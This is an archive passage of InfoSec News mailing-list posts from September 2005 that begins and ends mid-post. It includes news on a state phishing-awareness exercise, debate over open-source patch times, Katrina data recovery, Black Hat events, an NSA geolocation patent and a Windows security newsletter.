certain Google Wi-Fi locations in the San Francisco Bay area. However, the client can in fact be downloaded to any computer that is connected to the Internet. The page also says that while Google Secure Access should work at any Wi-Fi location, Google hasn't tested it elsewhere. Information about the Secure Access client is available on the Google Web site [1]. [1] http://wifi.google.com/faq.html From isn at c4i.org Wed Sep 21 00:09:59 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:21:53 2005 Subject: [ISN] Vigilance, Resilience Key to Cyber Security, Says New York State Official Message-ID: http://www.govtech.net/magazine/channel_story.php/96708 By Wayne Hanson Sept 20, 2005 "We just did a phishing exercise to 10,000 desktops," said Will Pelgrin, director of the New York State Office of Cyber Security and Critical Infrastructure Coordination. "We sent out a generic advisory on phishing, and no one was aware there would be an exercise to follow." About a month after the advisory, an e-mail arrived on those agency desktops. It came from outside, but appeared to be from state government. It said that since security was so important, and that passwords were the first line of defense, the state had developed a password checker for state employees. "It asked them to enter their personal password and user ID to see how good their passwords were," said Pelgrin. "Out of 10,000 employees, we had about 17 percent that fell prey to it at that time. A month or so later we went back to the same cohort of individuals to see if they learned from the educational component of this, and we cut our numbers down to about seven percent. Now," he said, "the job is to get to those seven percent." Pelgrin said the approach was "warm and fuzzy." Commissioners of affected agencies signed off on the exercise beforehand and looked at all documents before they were sent. And no information was collected on who fell for the ruse, just aggregate statistics. Those that provided a password and user ID got a message telling them what the exercise was all about, a video explaining the dangers of providing the information, and a survey. "From the survey," said Pelgrin, "We got a lot of responses that it taught them something about phishing, not only at work -- since we filter out a lot of that crud here -- but at home where you get much more of it." "This is about vigilance and resilience," he said. "One hundred percent security will never be obtainable. If you think you're safe, you're not secure. 9/11 taught us not to say things won't occur. Vigilance has to be there. Cars are becoming safer every day but you still need to buckle your seat belt." In keeping with that premise, Pelgrin has expanded the efforts of his office to educate and inform state and local government, law enforcement, and the public. His office -- along with the Department of Homeland Security's National Cyber Security Division and other organizations -- developed a cyber-security awareness program for New York, that other state and local governments around the country are invited to use. New York Governor E. Pataki proclaimed October as Cyber Security Awareness Month for the state, and Pelgrin and others are working to expand the idea nationwide, providing materials and programs to state and local governments. "We do a Web cast every other month," said Pelgrin. "It started out as a New York State effort and quickly became a national one, and is now international. We've had up to nine countries participate in those Web casts. I choose the topic area, and we look for vendors that could do the presentation. They are not unique to any vendor, they have to be generic ... things that people could take and actually implement to make themselves more secure than they were the day before. "We've done vulnerability risk assessments," he said, "taught people how to identify spyware, adware, and what to do about it. Over the last year, we've done about seven of those. Protecting Children "For October," said Pelgrin, "our theme is protecting children on the Internet. The slogan is: 'It's everyone's responsibility' Parents, teachers, law enforcement, government -- everyone needs to take a role to ensure our children are protected and also that children don't become the next hacking generation. We're really concerned that we've got to change the culture that a script kiddie [definition link] is not a right of passage -- it's wrong. We need to teach cyber ethics. We're all told that it's wrong to steal physical items, and only recently have we begun to teach kids that it's wrong to download copyrighted music. How can we make them good cyber citizens, how can we build into this culture? "Our governor has asked me to put on a major conference Oct. 20th," said Pelgrin, "and GTC is partnering with us on it. There will be about 1,000 adults, with a separate track for about 1,200 fourth and fifth graders. For the children we've hired a company ... which will do an interactive play on cyber security for the children. It will be streaming video and we're filming that and it will be broadcast by satellite, and we will make [the film] available to state and local governments." "We're asking schools across the country to participate by having classrooms set up. We're using some of the curriculum from Cybersmart as the basis for that scripting. The governor will keynote the conference, said Pelgrin. We have Alan Paller, director of research for the SANS Institute as second keynote, and we have Patrick Gray, director of X-Force Operations for ISS, doing the third keynote. And Howard Schmidt will be doing the VIP reception the night before." As if that weren't enough, Pelgrin has also contributed an introduction to a book coming out next year, The Black Book on Government Security. "Computer technology was really created as an enabler to make our lives more efficient more effective, to be able to communicate, provide customers with better service, promote e-commerce, etc.," he said. "Cyber security was always looked at as the impediment -- it's going to cost money, take time, etc. Now, though," he said, "because of attacks on technology, cyber security has changed from an impediment to an enabler ... We're to the point where security is critical, it's not an afterthought. "If security doesn't get down to the desktop level, he said, "we'll all lose." Note: Director Pelgrin did not present at GTC East this year, but was interviewed by phone last week. From isn at c4i.org Wed Sep 21 00:10:28 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:22:14 2005 Subject: [ISN] Re: [Full-disclosure] OSS means slower patches Message-ID: Forwarded from: security curmudgeon To: full-disclosure@lists.grok.org.uk Cc: editorial@australianIT.com.au Date: Mon, 19 Sep 2005 09:53:40 -0400 (EDT) Subject: Re: [Full-disclosure] OSS means slower patches : http://australianit.news.com.au/articles/0,7204,16650762%5E15306%5E%5Enbv%5E,00.html The obvious criticism: "The Mozilla family of browsers had the highest number of vulnerabilities during the first six months of 2005, with 25," the Symantec report says. "Eighteen of these, or 72 per cent, were rated as high severity. Microsoft Internet Explorer had 13 vendor confirmed vulnerabilities, of which eight, or 62 per cent, were considered high severity." Microsoft IE had at least 19 vulnerabilities from 2005-01-01 to 2005-06-30. Why does Symantec make the distinction of "X vulnerabilities in Mozilla" vs "MSIE had X *vendor confirmed vulnerabilities*"? This all to conveniently allows the silently patched vulnerabilities to slip through the cracks of our statistics. Does Mozilla's honesty in acknowledging vulnerabilities come back to bite them in the ass? Mozilla browsers had more than 25, but are 72 per cent really "high severity"? Download information spoofing x2, File extension spoofing, URL restriction bypass, DoS x2, redirect spoofing, XSS, link status bar spoofing, Dialog overlapping, URL Wrap Obfuscation.. are all of these really "high severity"? Is that theoretical, practical, or hype? Now, the media/symantec driven propoganda (for lack of better word?): THE growing popularity of open-source browsers and software may be responsible for the increasing gap between the exposure of a vulnerability and the provision of patch to fix it, security software vendor Symantec has said. Mr Sykes said the increasing popularity of open source software, such as the Mozilla Foundation's Firefox browser, could be part of the reason for the increase in the gap between vulnerability and patch, with the open source development model itself part of the problem. "It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window." The growth in Firefox vulnerability reports coincides with its increasing popularity with users. "It is very clear that Firefox is gaining acceptance and I would therefore expect to see it targeted," Mr Sykes said. "People don't attack browsers and systems per se, they attack the people that use them," he said. "As soon as large banks started using Linux, Linux vulnerabilities started to get exploited." The premise of this article is open source software is to blame for longer vendor response times. In laymen's terms, blame vendors like Mozilla for having vulnerabilities patched slower? Err, compared to what? This shallow article doesn't even qualify that statement! Slower than previous vulnerabilities? Slower than non open source? Given the article directly compares Mozilla browsers to Microsoft IE, it is trivial to assume the claim is made in relation to closed source vendors such as Microsoft. So then what .. 30 days "blown out" to 54 days is some huge time gap compared to Microsoft IE patches? What clueless *moron* really believes this crap they are shovelling? Is it Symantec or Chris Jenkins or Australian IT? Given that Symantec won't even quote previous statistics: "Symantec had not published previously statistics on the average time required to produce patches, but Mr Sykes said data showed the lag had previously been about 30 days." Given that Jenkins/AusIT/Symantec won't give us any statistics (even questionable ones) regarding MSIE patches, we're supposed to take this at face value? It is *well documented* that Microsoft takes well over 30 days to patch vulnerabilities. It is also becoming crystal clear that Microsoft is hiding behind their "30 day patch cycle" to imply that is the longest they go before patching a vulnerability, when it simply is not the case. Taking a look at a *single vendor* [1] and their experience with reporting vulnerabilities to Microsoft, we see that they give MS a 60 day window to patch vulnerabilities, and are consistantly overdue. As of this mail, the worse is *ONLY* 114 days past due (we've seen it closer to 250 days before). So again, where are these implications coming from? Where does this statement/conclusion/observation that "OSS causes slower patches" come from exactly? [1] http://www.eeye.com/html/research/upcoming/index.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From isn at c4i.org Wed Sep 21 00:11:26 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:22:46 2005 Subject: [ISN] Backups Enabled Systems to Survive Message-ID: http://www.washingtonpost.com/wp-dyn/content/article/2005/09/20/AR2005092001453.html By Elissa Silverman and Neil Irwin Washington Post Staff Writers September 21, 2005 The rescue effort began two days after the city flooded, and interim technology manager Rajeev Jain entered the building not knowing what to expect. The ground floor of the New Orleans school system headquarters was under three inches of water, and when he headed upstairs, he saw that the fourth-floor ceiling was damaged and leaking. Jain hailed police to sledgehammer through a locked door. He found what he was looking for in a storage closet: 170 dry and apparently undamaged computer backup tapes storing recently updated payroll records and other critical financial information. Working from an International Business Machines Corp. data recovery center in New York, Jain and colleagues from Alvarez & Marsal Business Consulting LLC were able to recreate the school district's computer system from afar. Last week the school system resumed issuing paychecks to New Orleans teachers. As the Gulf Coast cleans up after Hurricane Katrina, computer consultants, data recovery companies, and government and business officials say the area was apparently spared the worst when it comes to the condition of the computer records and backup systems. Government institutions and large companies generally had adequate backup systems in place and data-recovery contracts with firms such as IBM to help rescue damaged data tapes and rebuild software systems. The best-prepared had backup files stored on computers outside the hurricane zone. "I don't know of any situation we're dealing with . . . right now that the data is not recoverable," said Don DeMarco, general manager for IBM's business continuity and recovery sector. Disaster recovery has become a $6 billion share of the computer industry as companies and governments have taken to heart the lessons of lightning strikes, floods and other incidents, such as the Sept. 11, 2001, terrorist attacks. Unlike physical assets such as a building or inventory, lost information can be impossible to replace and can make it nearly impossible for a business to reopen. Major companies such as IBM and SunGard Data Systems Inc. have entire corporate campuses devoted to data recovery. Concerns about file protection have even shaped government decisions about where to put offices. In May, the Agriculture Department, for example, said it planned to move the payroll and other operations of its National Finance Center from New Orleans to Kansas City, Mo. The agency noted in announcing the move that computer operations in New Orleans "have significant exposure to risk" -- and indeed the facility's operations had to be shifted to off-site backup locations after the hurricane. Not everybody was protected. Kyle Mickelson, who runs a computer repair and support business in Gulfport, Miss., said that a number of his clients did not have backup accounting or customer records and lost all that information in the storm. He has also taken in dozens of water-damaged computers and hasn't been able to recover data from any of them. Others who thought they had made adequate precautions found that the magnitude of Katrina overwhelmed even the best planning. Jacqueline Mae Goldberg, a personal injury lawyer who practiced in New Orleans, said she created backup files and stored them at her home. In an e-mail she said both places were wrecked by the storm. "We've had a number of calls from companies in utter chaos," said Mike Sullivan, a senior vice president of VeriCenter Inc., a Texas firm that does data storage and backup. "They're at risk of losing their business, especially small and mid-sized companies." The extent of such damage will take time to assess. Those businesses that did have backup and emergency plans sometimes found that it not only protected their data, but also kept them operating throughout the hurricane and its aftermath. SCP Pool Corp., a New Orleans-based wholesaler of pool supplies, was able to relocate its corporate headquarters to VeriCenter's Dallas offices, where critical company information was backed up. As a result, there was no significant disruption to the delivery and distribution of its products from 200 centers around the country, said technology director Tim Babco. ? 2005 The Washington Post Company From isn at c4i.org Wed Sep 21 00:13:21 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:23:06 2005 Subject: [ISN] Upcoming Black Hat events announcement Message-ID: Forwarded from: Jeff Moss Dear Info Security News readers, I want to keep you up to date with what Black Hat is up to. Currently there is a stand alone training in Seattle in October, a Briefings in Tokyo in October, and a Federal Training and Briefings in Crystal City in January. Black Hat returns to Amsterdam at the end February with expanded training and briefings. The CFP for Amsterdam will open by October 15th. Video from the summer USA show is starting to get encoded, and we will be updating the Black Hat "Black Pages" in the coming weeks to reflect what happened, and still is happening, with the whole ISS/Cisco drama. Thank you. Jeff Moss -------------- Seattle Training On October 10-11, Black Hat will host four separate world-class trainings. The classes cover a variety of topics, including system administration, auditing and assessment, forensics, and infrastructure VoIP. Most of the class offerings are newly created or revised, ensuring that students are provided with up-to-date technical information. Our trainers are recognized leaders in their fields, with real-world experience that drives their curriculum. As with all Black Hat Training events, students are eligible for CISSP/SCCP credits upon successful completion. Courses offered are: * Hacking by Numbers - Bootcamp Edition by SensePost * Microsoft Ninjitsu by Tim Mullen * Invisible Network; Invisible Risk by Adam Laurie * Infrastructure Attacktecs & Defentecs: Cisco Voice Over IP (VoIP) by Stephen Dugan For more information: http://www.blackhat.com/html/training-seattle-05/train-bh-sea-05-index.html Our early bird registration rate is in effect until October 1. Register now and save: https://commerce.blackhat.com/seattle-reg ---------------- Tokyo, Keio Plaza Hotel * 17-18 October 2005 * japan.blackhat.com Black Hat is honored to continue its partnership with Internet Association Japan to bring the second annual Black Hat Briefings Japan. The Black Hat Japan 2005 Briefings will take place at the Keio Plaza Hotel, October 17-18. The Black Hat Japan Briefings feature an international line up of internationally renowned security experts from around the globe. Black Hat Briefings was originally founded in 1997 by Jeff Moss to fill the need of computer security professionals to better understand the security risks to their computers and information infrastructures by potential threats. To do this, the Black Hat Briefings assembles a group of vendor neutral security professionals and let them speak candidly about the problems businesses face, and the solutions they see to those problems. No gimmicks, no sales pitches, just straight talk by people who make it their business to explore the ever-changing security space. This year's conference will include talks by Dan Kaminsky on the Black Ops of TCP/IP, David Maynor and Robert Graham presenting on Architecture Flaws in Common Security Tools, the Grugq discussing VOIP security issues, Chris Hurley - Identifying and Responding to Wireless Attacks, Jeremiah Grossman presenting on Phishing with Super Bait, Saumil Shah and David Cole collaborating on an Adware/Spyware talk. Attendees will get the rare chance to meet with these and other experts up close and to ask specific questions about their findings, encouraging the quality exchange of information among the international attendees. For more information on the speakers and speeches visit http://www.blackhat.com/html/bh-japan-05/bh-jp-05-en-speakers.html Take advantage of our early registration rates by registering on-line now. http://www.blackhat.com/html/bh-registration/bh-registration.html#Japan From isn at c4i.org Wed Sep 21 00:15:34 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:23:29 2005 Subject: [ISN] Bruce Schneier: Wrong on Katrina, Wrong on Terrorism Message-ID: Forwarded from: The Unknown Security Person Hello InfoSec News, At 02:09 AM 9/19/2005, you wrote: > Forwarded from: Dan Verton > > http://www.itsecuritymagazine.com/its/Editors%20Desk/verton_opinion_schneier_091505.htm > > Bruce Schneier: Wrong About Katrina, Wrong About Terrorism [Snip...] Strange that a magazine purportedly for IT professionals is vulnerable to directory indexing. E.g., http://www.itsecuritymagazine.com/its/ From isn at c4i.org Thu Sep 22 01:31:35 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:44:01 2005 Subject: [ISN] Institute for IT security to launch in January Message-ID: http://www.vnunet.com/computing/news/2142615/computer-security-industry Daniel Thomas Computing 21 Sept 2005 An institute for IT security experts will be set up in January next year to improve professionalism throughout the computer security industry. The organisation, backed by the Department of Trade and Industry, the Cabinet Office and major UK firms such as BP, BT and The Royal Bank of Scotland, aims to promote professional standards and provide mentoring and work experience. The plan was first announced in January this year, and Computing has learned that it will start up in early 2006. The Institute for Information Security Professionals (IISP) will certify security experts in a similar way to many other professions, such as the British Medical Association for doctors. IT security professionals who qualify for membership will have to adhere to a code of conduct and attend workshops. "Knowing that someone has the experience, qualifications and adheres to a set of ethics is very important. It will improve confidence in the security industry and help when it comes to choosing people for jobs," said Nick Coleman, chairman of IT security suppliers group Saint, which is involved in the project. The organisation has already conducted market research to identify an acceptable membership fee, and is in discussion with existing institutes which may be appointed to run the scheme independently. "Doctors leave university with some of the best sets of degrees out there, but they don't immediately get a scalpel and start operating," said Paul Dorey, IISP founder and chief information security officer at BP. "They have mentoring and coaching before they are allowed to operate, and similar standards should exist in security." Development of the IISP is being led by Fred Piper, professor of security at University of London's Royal Holloway College, but leadership is expected to be handed over to an elected leader when it has an independent infrastructure next year. From isn at c4i.org Thu Sep 22 01:31:53 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:44:26 2005 Subject: [ISN] NSA granted Net location-tracking patent Message-ID: http://news.com.com/NSA+granted+Net+location-tracking+patent/2100-7348_3-5875953.html By Declan McCullagh Staff Writer, CNET News.com September 21, 2005 The National Security Agency has obtained a patent on a method of figuring out an Internet user's geographic location. Patent 6,947,978, granted Tuesday, describes a way to discover someone's physical location by comparing it to a "map" of Internet addresses with known locations. The NSA did not respond Wednesday to an interview request, and the patent description talks only generally about the technology's potential uses. It says the geographic location of Internet users could be used to "measure the effectiveness of advertising across geographic regions" or flag a password that "could be noted or disabled if not used from or near the appropriate location." Other applications of the geo-location patent, invented by Stephen Huffman and Michael Reifer of Maryland, could relate to the NSA's signals intelligence mission--which is, bluntly put, spying on the communications of non-U.S. citizens. "If someone's engaged in a dialogue or frequenting a 'bad' Web site, the NSA might want to know where they are," said Mike Liebhold, a senior researcher at the Institute for the Future who has studied geo-location technology. "It wouldn't give them precision, but it would give them a clue that they could use to narrow down the location with other intelligence methods." The NSA's patent relies on measuring the latency, meaning the time lag between computers exchanging data, of "numerous" locations on the Internet and building a "network latency topology map." Then, at least in theory, the Internet address to be identified can be looked up on the map by measuring how long it takes known computers to connect to the unknown one. Previous Next The technique isn't foolproof. People using a dial-up connection can't be traced beyond their Internet service provider--which could be in an different area of the country--and it doesn't account for proxy services like Anonymizer. Geo-location, sometimes called "geo-targeting" when used to deliver advertising, is an increasingly attractive area for Internet businesses. DoubleClick has licensed geo-location technology to deliver location-dependent advertising, and Visa has signed a deal to use the concept to identify possible credit card fraud in online orders. Digital Envoy holds a patent on geo-location, and Quova, a privately held firm in Mountain View, Calif., holds three more, one shared with Microsoft. "It's honestly not clear that there's anything special or technically advanced about what they're describing," Quova Vice President Gary Jackson said, referring to the NSA's patent. "I'd have to have our technical guys read it, but I don't think it impacts us in any way." From isn at c4i.org Thu Sep 22 01:32:50 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:45:02 2005 Subject: [ISN] Security UPDATE -- Tweaking Wi-Fi APs for Better Security -- September 21, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. Download Free: Patch & Spyware Management in one easy-to-use GUI http://list.windowsitpro.com/t?ctl=14281:4FB69 The Impact of Disk Defragmentation http://list.windowsitpro.com/t?ctl=1426C:4FB69 ==================== 1. In Focus: Tweaking Wi-Fi APs for Better Security 2. Security News and Features - Recent Security Vulnerabilities - Update Rollup 1 for Windows 2000 SP4 Re-released - Critical Bug in Firefox, Mozilla, and Netscape Browser - Take a Closer Look at EFS 3. Instant Poll 4. Security Toolkit - Security Matters Blog - FAQ 5. New and Improved - Management and Security Appliance ==================== ==== Sponsor: Shavlik ==== Download Free: Patch & Spyware Management in one easy-to-use GUI. Is your network really secure? The first step to securing your network is to remove spyware, adware, and malware. Next, patch your systems to stop re-infestation. Introducing Shavlik NetChk Protect-- Patch & Spyware Management in one easy-to-use GUI. Shavlik NetChk Protect is an automated solution designed for the enterprise that boasts accurate detection/remediation and prevents spyware installation, maximizing network security against such threats. Remediate spyware and install patches with Shavlik NetChk Protect for a complete security solution. To download free software visit: http://list.windowsitpro.com/t?ctl=14281:4FB69 ==================== ==== 1. In Focus: Tweaking Wi-Fi APs for Better Security ==== by Mark Joseph Edwards, News Editor, mark at ntsecurity / net Security has become even more important due to the spread of wireless networking. As a result, we've seen several new wireless security companies spring to life and subsequently grow by leaps and bounds. These companies make specialized solutions that consist of proprietary hardware and software that guard wireless networks against a wide range of potential intrusions. Even if you have one or more of these specialized tools in place, you can improve your wireless security, particularly by adjusting the operation of your Access Points (APs). For example, you can manage AP transmission output power and shape the pattern and direction of signal transmission. Although I don't know of any APs that ship from the manufacturer with built-in configuration settings that let you adjust transmission power levels, they might exist. If so, you could turn down the transmission power output level to reduce the distance that the signals will propagate. This helps limit the vicinity in which potential intruders can operate. If your AP doesn't include such a feature, you could possibly install third-party firmware for your AP that does provide such support. Several third-party firmware solutions are available for hardware based on Broadcom chipsets, such as Cisco Systems, Linksys, Buffalo Technology, ASUS, Motorola, Siemens, U.S. Robotics, and NETGEAR APs. Last week I downloaded a third-party firmware package, installed it to an AP, and configured it according to my needs in under 30 minutes. Like most AP firmware, the third-party solution has an intuitive interface, so I didn't need to read any detailed documentation to make it work right. As a result of installing the third-party firmware, I was able to configure that AP to reduce transmission output from 20 milliwatts (mW) to about 3 mW, which is all that I need for that particular office space. As a result, any would-be intruders would have to be physically in the office before they could get a usable connection to that wireless network. The end result is stronger security for only a few dollars. Using third-party firmware offers other benefits. For example, the firmware I installed supports a custom desktop client that interacts with the AP. Using that client, I can see all the AP's connections; view all broadcasting clients on the wireless network, including those not connected to that AP; measure bandwidth usage; and more. Other benefits include the ability to run Secure Shell (SSH) server directly on the AP for remote access and administration. Doing so means that I don't have to expose a Web interface. I could also establish a PPTP VPN server, Quality of Service (QoS) and bandwidth management parameters, and virtual LANs; quickly block peer-to-peer (P2P) clients; configure IPv6; use a remote syslog server; force the use of Wi-Fi Protected Access (WPA) and WPA2 authentication; and even configure a way for guests to easily use the wireless network to surf the Internet when visiting the office. Third-party firmware also offers many other features that I don't have room to discuss here. The bottom line is that third-party firmware is easy to install and use, doesn't require any specialized skills or knowledge for everyday use, is incredibly cheap to obtain and administer, and strengthens your overall wireless security. If you do have advanced skills, you can easily add on to third-party firmware solutions to extend the capabilities even further. For example, you could add a mini-Web server, a controlled access public hotspot interface, Voice over IP (VoIP) capabilities, Remote Authentication Dial-In User Service (RADIUS) authentication, and more. If you're interested in more information about third-party AP firmware, please send me a quick email message (even an anonymous message is all right) to express your interest. Use "AP Firmware" as the subject of your email so that I can quickly locate your message in my inbox. If there's enough interest, I could write about how to decide which firmware might be best for your needs, where to find it, how to quickly and easily get it working for better security in your environment, and how to extend its functionality even further. ==================== ==== Sponsor: Diskeeper ==== The Impact of Disk Defragmentation Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance such that systems were unusable. In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure. http://list.windowsitpro.com/t?ctl=1426C:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=14274:4FB69 Update Rollup 1 for Windows 2000 SP4 Re-released Microsoft didn't release any security bulletins this month as part of its regular release schedule. Microsoft had previously indicated that it would release one security bulletin, but the company discovered problems in the patch and decided not to release it until it meets quality control standards. However, the company did re-release Update Rollup 1 for Windows 2000 Service Pack 4 (SP4) to address numerous problems. http://list.windowsitpro.com/t?ctl=14279:4FB69 Critical Bug in Firefox, Mozilla, and Netscape Browsers Last week, Tom Ferris reported a buffer overflow vulnerability in Mozilla Firefox Web browsers. The vulnerability exists due to faulty processing of URLs and could lead to the execution of remote code. Netscape and other Mozilla browsers are also affected by the problem because they share the same code base as Firefox. http://list.windowsitpro.com/t?ctl=1427D:4FB69 Take a Closer Look at EFS Contrary to popular opinion, Microsoft's Encryption File System (EFS) is a reliable, easy-to-use, and secure encryption solution, and it can trump even the network administrator's rights. EFS is great for protecting confidential files on the network and on often-stolen laptop computers. In this article, Roger Grimes discusses the basics of EFS, talks about its purpose and functionality, and discusses basic administrative tasks and pitfalls. http://list.windowsitpro.com/t?ctl=1427C:4FB69 ==================== ==== Resources and Events ==== Cut Your Windows XP Migration Time by 60% or More! If your organization is considering--or has already begun migrating your operating system to Windows XP, then this Web seminar is for you. Sign up for this free event and you'll learn how to efficiently migrate your applications into the Windows Installer (MSI) format, to prepare them for error-free deployment, what steps you need to follow to package your applications quickly and correctly, and more! http://list.windowsitpro.com/t?ctl=14273:4FB69 Discover SQL Server 2005 for the Enterprise. Are you prepared? In this free half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today! http://list.windowsitpro.com/t?ctl=14272:4FB69 Get Ready for the SQL Server 2005 Roadshow in Europe Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and a one-year subscription to SQL Server Magazine. Register now. http://list.windowsitpro.com/t?ctl=1426F:4FB69 Are You Walking the Tightrope Between Recovery and Continuity? There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage. In this free Web seminar, you'll learn what the technical differences are between recovery and continuity, when each is important, and what you can do to make sure that you're hitting the right balance between them. http://list.windowsitpro.com/t?ctl=1426E:4FB69 High Risk Internet Access: Are You in Control? Defending against Internet criminals, spyware and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? This free Web seminar will give you the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of acceptable use policies (AUPs). http://list.windowsitpro.com/t?ctl=14270:4FB69 ==================== ==== 3. Instant Poll ==== Results of Previous Poll: Does your company use an encryption product to protect files and folders on Windows systems? The voting has closed in this Windows IT Pro Security Hot Topic nonscientific Instant Poll. Here are the results from the 12 votes. - 17% Yes, we use Microsoft Windows Encrypting File System (EFS). - 33% Yes, we use a third-party product. - 0% We haven't used encryption in the past, but we're considering it now. - 50% No, we don't see any need to encrypt data. New Instant Poll: Have you, your company, or someone you know been a victim of online fraud? Go to the Security Hot Topic and submit your vote for - Yes - No - Not sure http://list.windowsitpro.com/t?ctl=1427E:4FB69 ==================== ==== Featured White Paper ==== Software Packaging Workflow Best Practices Managing desktop software configurations doesn't have to be a manual process, resulting in unplanned costs, deployment delays, and client confusion. In this free white paper, you'll learn how to manage the software package preparation process and increase your desktop reliability, user satisfaction, and IT cost effectiveness. Download your copy now and discover the value of standardizing the software packaging process. http://list.windowsitpro.com/t?ctl=1426D:4FB69 ==================== ==== Hot Release ==== Consolidate Your SQL Server Infrastructure Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Download your free copy now. http://list.windowsitpro.com/t?ctl=1426B:4FB69 ==================== ==== 4. Security Toolkit ==== Security Matters Blog: Your Inbox Is Open to the World by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=14280:4FB69 Heard of Mailinator? Get a mailbox at this throw-away service and anybody can read your inbox. But that's OK. A Mailinator mailbox address is just to give out to someone from whom you want to receive one message--someone you suspect might follow up with spam. You get the desired message, then Mailinator deletes your temporary account. http://list.windowsitpro.com/t?ctl=1427A:4FB69 FAQ by John Savill, http://list.windowsitpro.com/t?ctl=1427F:4FB69 Q: How can I use a script to generate a list of all IP addresses on a machine? Find the answer at http://list.windowsitpro.com/t?ctl=1427B:4FB69 ==================== ==== Announcements ==== (from Windows IT Pro and its partners) Get All the Exchange Tips You Need If you haven't subscribed to Exchange & Outlook Administrator, you're missing out on key information that will go a long way toward preventing serious messaging problems and downtime. Order now and discover tools and solutions you won't find anywhere else to help you migrate, optimize, administer, back up, recover, and secure Exchange and Outlook. Subscribe today: http://list.windowsitpro.com/t?ctl=14276:4FB69 Windows IT Pro Has What IT Professionals Need Get Windows IT Pro and get answers. Subscribe today and get an entire year for just $39.95--that's 44% off the cover price! You'll also gain exclusive access to the entire Windows IT Pro article database (over 9000 articles) and get the Top Windows Tips handbook (over 50 helpful tips) FREE. This is a limited-time, risk-free offer, so click here now: http://list.windowsitpro.com/t?ctl=14277:4FB69 ==================== ==== 5. New and Improved ==== by Renee Munshi, products@windowsitpro.com Management and Security Appliance KACE announced KBOX IT Management Suite 2.0, a server appliance for midsized businesses that manages and monitors inventory, distribution, patching, security, compliance, messaging, licensing, and performance for the systems on their networks. When you add the KBOX Security Enforcement and Audit Module, the KBOX appliance scans for and reports on known security vulnerabilities based on the Open Vulnerability and Assessment Language (OVAL) standard, which covers almost 1000 vulnerabilities and is sponsored by the United States Computer Emergency Readiness Team (US-CERT) and the Department of Homeland Security. KBOX also lets you deploy security policies with support for automatic remediation, repair, and if necessary, network node isolation (quarantine). For more information, go to http://list.windowsitpro.com/t?ctl=14283:4FB69 Tell Us About a Hot Product and Get a T-Shirt! Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com. Editor's note: Share Your Security Discoveries and Get $100 Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length. ==================== ==== Sponsored Links ==== Argent Versus MOM 2005 Download Argent Versus Microsoft Operations Manager 2005 http://list.windowsitpro.com/t?ctl=1426A:4FB69 Is Your Office Truly Fax Integrated? Download this free whitepaper from Faxback and find out! http://list.windowsitpro.com/t?ctl=14271:4FB69 ==================== ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://list.windowsitpro.com/t?ctl=14282:4FB69 About product news -- products@windowsitpro.com About your subscription -- windowsitproupdate@windowsitpro.com About sponsoring Security UPDATE -- salesopps@windowsitpro.com ==================== This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today. http://list.windowsitpro.com/t?ctl=14278:4FB69 View the Windows IT Pro privacy policy at http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy Windows IT Pro, a division of Penton Media, Inc. 221 East 29th Street, Loveland, CO 80538 Attention: Customer Service Department Copyright 2005, Penton Media, Inc. All rights reserved. From isn at c4i.org Thu Sep 22 01:33:05 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 22 01:45:53 2005 Subject: [ISN] Irate football fans launched DoS attacks Message-ID: http://news.zdnet.co.uk/internet/0,39020369,39219634,00.htm Tom Espiner ZDNet UK September 21, 2005 Manchester United fans enraged at Malcolm Glazer's takeover bid unleashed cyberattacks against the American millionaire's legal advisors earlier this year Legal firm Allen & Overy fought off a number of DoS attacks earlier this year when it was negotiating Malcolm Glazer's takeover bid of Manchester United, a company representative has revealed. Infuriated fans of the club attempted to overload the firm's servers "by sending a large quantity of large emails," over the months that Allen & Overy were representing Glazer, according to Mark Andrews, infrastructure developer with the firm. "Their intention was to stop us from representing Glazer," Andrews told ZDNet UK at a roundtable security session in 